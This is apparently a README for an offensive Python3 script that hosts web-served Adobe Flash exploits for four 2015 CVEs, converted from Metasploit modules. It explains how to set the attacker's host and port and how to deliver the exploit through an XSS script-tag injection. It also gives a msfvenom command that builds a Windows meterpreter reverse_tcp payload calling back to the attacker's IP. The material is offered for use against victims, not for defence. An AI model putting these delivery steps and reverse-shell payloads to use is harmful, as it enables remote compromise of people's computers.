Adobe Flash Exploits CVE-2015-3090, CVE-2015-3105, CVE-2015-5119, and CVE-2015-5122 Python3 Script

Converted Metasploit exploits for Adobe Flash vulnerabilities CVE-2015-3090, CVE-2015-3105, CVE-2015-5119, and CVE-2015-5122 to a Python3 script.

Information

This script will host a web server that can exploit one of the following Adobe Flash vulnerabilities at a time:

1. CVE-2015-3090
2. CVE-2015-3105
3. CVE-2015-5119
4. CVE-2015-5122

Execute

You must make changes (outlined here) to exploit.py to suit your needs.

Modifications

• hostname = "192.168.1.100"
  • This is an IP on the attacking system that will host the exploit web server.
• serverPort = 8080
  • This is the port on the attacking system that will host the exploit web server.
• xss = False
  • If set to True, then the victim's first request to the server is treated as JavaScript:
    • Example XSS Inject:
      • <script src="http://192.168.1.100:8080/"></script>
    • Attack path:
      • Victim request 1 -> XSS vulnerable server:
        • Victim accesses XSS inject on a remote server that requests a JavaScript file (see request 2).
      • Victim request 2 -> JavaScript source on attacking system.
      • Victim request 3 -> Malicious swf file.
  • If set to False, then the victim's first request to the server is treated as HTML:
    • Example:
      • http://192.168.1.100:8080/
    • Attack path:
      • Victim request 1 -> HTML file on attacking system.
      • Victim request 2 -> Malicious swf file.
• base64Payload = "..."
  • This is the base64 payload that will be executed on the victim system.
  • Modify the example command below to suit your needs and generate your payload:
    • Example:
      • msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 | base64

    • Note: The only payload that has worked for me is windows/meterpreter/reverse_tcp.

• swfFile = swfFileList['37368']
  • Select the Adobe Flash exploit swf file to use for exploiting the victim system:

    • swfFileList = {
          '37368': 'CVE-2015-3090.swf',
          '37448': 'CVE-2015-3105.swf',
          '37523': 'CVE-2015-5119.swf',
          '37599': 'CVE-2015-5122.swf'
      }
      

Run

Run the following command, in the same directory as the malicious swf files, to execute the Adobe Flash exploit script:

• python3 exploit.py

References:

CVE-2015-3090 -> https://exploit-db.com/exploits/37368

CVE-2015-3105 -> https://exploit-db.com/exploits/37448

CVE-2015-5119 -> https://exploit-db.com/exploits/37523

CVE-2015-5122 -> https://exploit-db.com/exploits/37599